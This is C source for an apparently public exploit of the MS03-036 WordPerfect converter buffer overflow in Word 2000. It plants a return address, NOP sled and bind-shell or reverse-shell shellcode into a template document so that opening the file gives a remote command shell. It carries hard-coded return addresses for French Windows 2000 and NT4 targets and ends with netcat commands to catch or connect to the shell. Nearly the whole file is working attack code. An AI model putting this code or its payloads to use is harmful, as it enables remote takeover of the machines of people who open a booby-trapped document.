  1. /******************************************************************/
  2. /*   Microsoft WordPerfect Document Converter Buffer Overflow Exploit MS03-036    */
  3. /*                                                                                                                */
  4. /*                                  Exploit with several targets                                         */
  5. /*                                                                                                                */
  6. /*        Find your own return address with :                                                       */
  7. /*            findhex dllname FF D4 (call esp)                                                      */
  8. /*            findhex dllname FF E4 (jmp esp)                                                      */
  9. /*                                                                                                                */
  10. /* Credits :                                                                                                   */
  11. /* vulnerability : Yuji "The Ninja" Ukai                                                              */
  12. /* findhex : Jason Jordan                                                                               */
  13. /* sk scan-associates.net                                                                               */
  14. /* shellcode : metasploit                                                                                */
  15. /* exploit : valgasu - RstAck                                                                           */
  16. /*                                                                                                                */
  17. /******************************************************************/
  18.  
  19.  
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
  25.  
/* eip offset for Word 2000 9.0.2812 */
/* Byte offset inside the template document at which the saved return
 * address is overwritten (main() seeks here, writes the 4-byte address,
 * then a NOP sled and the shellcode right after it).  The value is specific
 * to the Word build doing the conversion; switch the active #define below
 * when targeting the other build. */
#define EIP_OFFSET 1359

/* eip offset for Word 2000 9.0.4462 SR1 */
//#define EIP_OFFSET 1343
  31.  
  32.  
/* Print the command-line help to stdout and terminate with exit status 1.
 * name is argv[0] and is echoed in the "Usage:" line. */
void usage(char *name)
{
    fputs("\n-- --\n"
          "-- WordPerfect Document Converter Exploit --\n"
          "-- --\n\n", stdout);
    printf("Usage: %s <shell type> <template doc> <os> <port> [<ip>]\n\n", name);
    fputs("Shell type : 1 - Bind shell (need port)\n"
          " 2 - Reverse shell (need ip and port)\n\n"
          "OS : 1 - Windows 2000 Pro SP3 French\n"
          " 2 - Windows NT4 Workstation SP5 French\n"
          " 3 - Windows NT4 Workstation SP6 French\n", stdout);
    exit(1);
}
  47.  
  48.  
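/* The target process is 32-bit x86, so a saved return address is exactly
 * four bytes -- independent of the pointer width of the compiler building
 * this tool.  (The original wrote sizeof(const char *) bytes, which is only
 * correct on a 32-bit build and reads past the 4-byte literal elsewhere.) */
enum {
    RET_ADDR_LEN = 4,
    NOP_SLED_LEN = 24   /* 0x90 bytes between the return address and the shellcode */
};

/* Offsets of the hard-coded sockaddr_in fields inside the payloads below.
 * Both payloads contain "\x68\x02\x00\x22\x11" (push AF_INET + placeholder
 * port 0x1122); the reverse shell also contains "\x68\xc0\xa8\x00\xf7"
 * (push placeholder address).  The placeholders are patched at run time. */
enum {
    BIND_PORT_OFFSET = 227,
    REV_PORT_OFFSET  = 185,
    REV_IP_OFFSET    = 178
};

/* One selectable target: a display name plus the little-endian address of a
 * call esp / jmp esp instruction (see the findhex note in the file header).
 * ret[] is deliberately sized to drop the string literal's terminator. */
struct target {
    const char *name;
    char ret[RET_ADDR_LEN];
};

/* <os> argument N selects targets[N - 1].  Add your own return address here. */
static const struct target targets[] = {
    { "Windows 2000 Pro SP3 - French",        "\xA7\x88\xE2\x77" },
    { "Windows NT4 Workstation SP5 - French", "\x10\x45\xEB\x77" },
    { "Windows NT4 Workstation SP6 - French", "\x36\x28\xF3\x77" },
};

/* Parse a TCP port (1..65535) from text.
 * Returns the port, or 0 when text is not a whole number in that range
 * (0 is never a usable port here, so it doubles as the error value). */
static unsigned short parse_port(const char *text)
{
    char *end = NULL;
    long value = strtol(text, &end, 10);

    if (end == text || *end != '\0' || value < 1 || value > 65535) {
        return 0;
    }
    return (unsigned short)value;
}

/* Map the <os> argument to a target.
 * On success returns the RET_ADDR_LEN-byte return address and stores the
 * target's display name in *description; returns NULL for an unknown choice. */
static const char *select_target(int choice, const char **description)
{
    size_t count = sizeof targets / sizeof targets[0];

    if (choice < 1 || (size_t)choice > count) {
        return NULL;
    }
    *description = targets[choice - 1].name;
    return targets[choice - 1].ret;
}

/* Seek to offset in f and overwrite len bytes from data.
 * Returns 0 on success, -1 if the seek or the write fails or is short. */
static int write_at(FILE *f, long offset, const void *data, size_t len)
{
    if (fseek(f, offset, SEEK_SET) != 0) {
        return -1;
    }
    if (fwrite(data, 1, len, f) != len) {
        return -1;
    }
    return 0;
}

/* Entry point.  argv: <shell type> <template doc> <os> <port> [<ip>]
 *   shell type : 1 = bind shell (listens on <port>),
 *                2 = reverse shell (connects back to <ip>:<port>; <ip> required)
 *   template doc : an existing document, MODIFIED IN PLACE at EIP_OFFSET
 *   os : index into targets[] (return address for the overwritten EIP)
 * Writes, in order: the 4-byte return address, NOP_SLED_LEN NOPs, the chosen
 * shellcode with its port (and address) placeholders patched.
 * Returns 0 on success; exits with status 1 on any bad argument or I/O error. */
int main(int argc, char *argv[])
{
    unsigned char bindshell[] =
    "\x66\x81\xec\x80\x00\x89\xe6\xe8\x4b\x01\x00\x00\x89\x06\xff\x36"
    "\x68\x8e\x4e\x0e\xec\xe8\x52\x01\x00\x00\x89\x46\x08\xff\x36\x68"
    "\xad\xd9\x05\xce\xe8\x43\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
    "\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
    "\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\x1e\x01\x00\x00\x89\x46"
    "\x10\xff\x36\x68\xef\xce\xe0\x60\xe8\x0f\x01\x00\x00\x89\x46\x14"
    "\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xff\x00\x00\x00\x89\x46\x18"
    "\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xef\x00\x00\x00\x89\x46\x1c"
    "\xff\x76\x04\x68\xa4\x1a\x70\xc7\xe8\xdf\x00\x00\x00\x89\x46\x20"
    "\xff\x76\x04\x68\xa4\xad\x2e\xe9\xe8\xcf\x00\x00\x00\x89\x46\x24"
    "\xff\x76\x04\x68\xe5\x49\x86\x49\xe8\xbf\x00\x00\x00\x89\x46\x28"
    "\xff\x76\x04\x68\xe7\x79\xc6\x79\xe8\xaf\x00\x00\x00\x89\x46\x2c"
    "\x31\xff\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56"
    "\x18\x50\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\x57\x57"
    "\x68\x02\x00\x22\x11\x89\xe1\x68\x16\x00\x00\x00\x51\x53\xff\x56"
    "\x20\x57\x53\xff\x56\x24\x57\x51\x53\xff\x56\x28\x89\xc2\x68\x65"
    "\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\x66\x30\x81\xc4\xac\xff\xff"
    "\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xc1\x15\xab\xe2\xfd\xc6\x44"
    "\x24\x10\x44\xfe\x44\x24\x3d\x89\x54\x24\x48\x89\x54\x24\x4c\x89"
    "\x54\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
    "\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff\xff\xff\xff\xff"
    "\x31\x89\xc1\x57\xff\x56\x14\x56\x64\xa1\x30\x00\x00\x00\x8b\x40"
    "\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57"
    "\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18"
    "\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc"
    "\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c"
    "\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c"
    "\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d"
    "\x5b\xc2\x04\x00";

    /* unsigned char, like bindshell, so byte patching below is uniform. */
    unsigned char revshell[] =
    "\x66\x81\xec\x80\x00\x89\xe6\xe8\x10\x01\x00\x00\x89\x06\xff\x36"
    "\x68\x8e\x4e\x0e\xec\xe8\x17\x01\x00\x00\x89\x46\x08\xff\x36\x68"
    "\xad\xd9\x05\xce\xe8\x08\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00"
    "\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89"
    "\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\xe3\x00\x00\x00\x89\x46"
    "\x10\xff\x36\x68\x7e\xd8\xe2\x73\xe8\xd4\x00\x00\x00\x89\x46\x14"
    "\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xc4\x00\x00\x00\x89\x46\x18"
    "\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xb4\x00\x00\x00\x89\x46\x1c"
    "\xff\x76\x04\x68\xec\xf9\xaa\x60\xe8\xa4\x00\x00\x00\x89\x46\x20"
    "\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
    "\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\xeb\x03\xff\x56"
    "\x14\x68\xc0\xa8\x00\xf7\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51"
    "\x53\xff\x56\x20\x85\xc0\x75\xe6\x68\x63\x6d\x64\x00\x89\x66\x30"
    "\x81\xc4\xac\xff\xff\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xe9\xeb"
    "\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89\x5c\x24\x48"
    "\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51"
    "\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff"
    "\xff\xff\xff\xff\x31\xff\x56\x0c\x89\xc1\xeb\x92\x56\x64\xa1\x30"
    "\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04"
    "\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78"
    "\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b"
    "\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01"
    "\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b"
    "\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0"
    "\x89\xea\x5f\x5e\x5d\x5b\xc2\x04\x00";

    FILE *docfile = NULL;
    const char *eip = NULL;
    const char *targetos = NULL;
    unsigned char *payload = NULL;
    size_t payload_len = 0;
    unsigned short port = 0;
    uint16_t port_be = 0;
    unsigned char nops[NOP_SLED_LEN];
    long payload_end = 0;
    int bshell = 0;

    if (argc < 5) {
        usage(argv[0]);
    }

    printf("\n-- --\n");
    printf("-- WordPerfect Document Converter Exploit --\n");
    printf("-- --\n\n");

    /* Shell type */
    switch (atoi(argv[1])) {
    case 1:
        printf("-- Shell type : bind shell\n");
        bshell = 1;
        break;

    case 2:
        printf("-- Shell type : reverse shell\n");
        bshell = 0;
        break;

    default:
        printf("-- Shell type : unknown\n");
        exit(1);
    }

    /* The reverse shell needs <ip>; without this check argv[5] is NULL and
     * inet_addr(NULL) is reached. */
    if (!bshell && argc < 6) {
        printf("-- Reverse shell needs <ip>\n");
        usage(argv[0]);
    }

    /* Validate every argument before touching the template file. */
    port = parse_port(argv[4]);
    if (port == 0) {
        printf("-- Invalid port : \"%s\"\n", argv[4]);
        exit(1);
    }

    eip = select_target(atoi(argv[3]), &targetos);
    if (eip == NULL) {
        printf("-- Target OS : unknown\n");
        exit(1);
    }

    /* Customize shellcode: patch the sockaddr_in placeholders.  memcpy avoids
     * the misaligned 16/32-bit stores the original made through casts. */
    port_be = (uint16_t)htons(port);

    if (bshell) {
        memcpy(&bindshell[BIND_PORT_OFFSET], &port_be, sizeof port_be);
        payload = bindshell;
        payload_len = sizeof bindshell - 1;   /* drop the literal's terminating NUL */
        printf("-- Port : %u\n", (unsigned)port);
    } else {
        /* inet_addr() reports a malformed address as INADDR_NONE
         * (0xffffffff); that value is also 255.255.255.255, which is never a
         * usable connect-back address here, so rejecting it is safe. */
        unsigned long raw = inet_addr(argv[5]);
        uint32_t addr;

        if (raw == 0xFFFFFFFFUL) {
            printf("-- Invalid IP : \"%s\"\n", argv[5]);
            exit(1);
        }
        addr = (uint32_t)raw;   /* already in network byte order */

        memcpy(&revshell[REV_PORT_OFFSET], &port_be, sizeof port_be);
        memcpy(&revshell[REV_IP_OFFSET], &addr, sizeof addr);
        payload = revshell;
        payload_len = sizeof revshell - 1;    /* drop the literal's terminating NUL */
        printf("-- Port : %u\n", (unsigned)port);
        printf("-- IP : %s\n", argv[5]);
    }

    printf("-- Target OS : %s\n", targetos);

    /* Open template file -- it is modified in place. */
    docfile = fopen(argv[2], "r+b");
    if (docfile == NULL) {
        printf("-- Can't open file %s\n", argv[2]);
        exit(1);
    }
    printf("-- Template file : \"%s\"\n", argv[2]);

    /* Writes past the end of the template extend the file rather than
     * overwriting document content, so warn when that would happen. */
    payload_end = EIP_OFFSET + RET_ADDR_LEN + NOP_SLED_LEN + (long)payload_len;
    if (fseek(docfile, 0, SEEK_END) == 0) {
        long size = ftell(docfile);
        if (size >= 0 && size < payload_end) {
            printf("-- Warning : template is %ld bytes, payload ends at byte %ld\n",
                   size, payload_end);
        }
    }

    /* Layout: [return address][NOP sled][shellcode], starting at EIP_OFFSET.
     * Exactly RET_ADDR_LEN bytes of the address are written (the original
     * used sizeof(eip), i.e. the host pointer size). */
    memset(nops, 0x90, sizeof nops);

    if (write_at(docfile, EIP_OFFSET, eip, RET_ADDR_LEN) != 0 ||
        write_at(docfile, EIP_OFFSET + RET_ADDR_LEN, nops, sizeof nops) != 0 ||
        write_at(docfile, EIP_OFFSET + RET_ADDR_LEN + NOP_SLED_LEN,
                 payload, payload_len) != 0) {
        printf("-- Can't write to file %s\n", argv[2]);
        fclose(docfile);
        exit(1);
    }

    /* fclose flushes the buffered writes; a failure here means the file was
     * not actually updated. */
    if (fclose(docfile) != 0) {
        printf("-- Can't write to file %s\n", argv[2]);
        exit(1);
    }

    printf("-- Status : template file modified\n");

    if (bshell) {
        printf("-- After document execution : nc <ip> %u\n", (unsigned)port);
    } else {
        printf("-- Before document execution : nc -l -p %u\n", (unsigned)port);
    }

    return 0;
}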
  225.  
  226.  
  227. // milw0rm.com [2003-09-06]
  228.            